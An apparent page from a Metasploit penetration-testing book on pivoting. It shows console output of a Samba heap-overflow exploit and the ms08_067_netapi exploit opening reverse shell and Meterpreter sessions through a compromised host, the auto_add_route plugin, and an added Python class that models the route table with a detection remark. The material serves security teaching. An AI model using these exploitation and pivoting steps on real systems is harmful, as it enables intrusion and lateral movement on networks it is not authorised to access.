Meterpreter

91

[+] Server did not respond, this is expected
[*] Trying to exploit Samba with address 0xffffe411...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Trying to exploit Samba with address 0xffffe412...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...
[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (10.10.1.129:8080 -> 192.168.33.132:1608) 

Compare the LHOST and RHOST variables to the network information displayed by ifconfig. Our LHOST option specifies the IP address of our attacking machine. Also notice that the RHOST option's IP address is set to a different network subnet, and that we are attacking systems by tunneling our traffic through our compromised target to additional systems on the target's network. We are leveraging the pivoting attack through Metasploit to pass communications through our exploited machine to the target machine that resides on the local subnet. In this case, if the heap overflow is successful, we should be presented with a reverse shell from 192.168.33.132, simply by leveraging the network communications on the already compromised machine. When we run the exploit with exploit, we see at   that a connection is set up as expected on a different machine, not the Windows XP machine. Now, to port scan through the pivot, we would use the scanner/portscan/tcp scanner module, which is built to handle routing through Metasploit.

NOTE

You could also use the scanner/portscan/tcp scanner to conduct a series of port scans through your compromised target on the local subnet itself. We won't go into the details here, but just know that you can perform port scanning on a compromised network leveraging this module.

In the preceding examples, we used the route add command after we had compromised the system. Alternatively, to add the routes automatically to Meterpreter upon a new session spawn, we could use load auto_add_route:

msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.10.1.129:443
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (10.10.1.129:443 -> 192.168.33.130:1090)
[*] AutoAddRoute: Routing new subnet 192.168.33.0/255.255.255.0 through session 1
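To make the routing behind route add and the auto_add_route plugin concrete, here is an added example (not code from the book or from Metasploit itself) that models the framework's route table as a small Python class: it parses the AutoAddRoute console line shown above, registers the subnet against the session, and resolves which session a given target host would be tunnelled through. The PivotTable class, its method names and the longest-prefix tie-breaking are assumptions for illustration; the log line format is the one printed on this page.

```python
import ipaddress
import re

# Constructed sample of the console line the auto_add_route plugin prints
# when it registers a pivot; the format is copied from the page.
AUTOROUTE_LINE = (
    "[*] AutoAddRoute: Routing new subnet 192.168.33.0/255.255.255.0 "
    "through session 1"
)

_AUTOROUTE_RE = re.compile(
    r"AutoAddRoute: Routing new subnet (\S+)/(\S+) through session (\d+)"
)


class PivotTable:
    """Toy model (assumption) of Metasploit's route table: subnet -> session."""

    def __init__(self):
        self.routes = []  # list of (IPv4Network, session_id)

    def add(self, subnet, netmask, session_id):
        # Equivalent of `route add <subnet> <netmask> <session>` in msfconsole.
        net = ipaddress.IPv4Network(f"{subnet}/{netmask}", strict=False)
        self.routes.append((net, int(session_id)))

    def add_from_log(self, line):
        """Register the route announced by an AutoAddRoute line; returns the session id."""
        m = _AUTOROUTE_RE.search(line)
        if not m:
            raise ValueError("not an AutoAddRoute line")
        self.add(*m.groups())
        return int(m.group(3))

    def session_for(self, host):
        """Session id a connection to `host` is tunnelled through, or None if
        msfconsole would reach it directly. The most specific (longest-prefix)
        route wins, as in an ordinary routing table."""
        addr = ipaddress.IPv4Address(host)
        matches = [(net.prefixlen, sid) for net, sid in self.routes if addr in net]
        return max(matches)[1] if matches else None


if __name__ == "__main__":
    table = PivotTable()
    table.add_from_log(AUTOROUTE_LINE)
    # Hosts on 192.168.33.0/24 are reached via session 1, so from the
    # defender's side their connections originate from the pivot host
    # (192.168.33.130 above), not from the attacker's 10.10.1.129.
    print(table.session_for("192.168.33.132"), table.session_for("10.10.1.5"))
```

The practical consequence for detection is visible in the session line on this page: the reverse shell from 192.168.33.132 is only reachable because the pivot host already holds a session, so east-west connections sourced from that host are the artefact to look for.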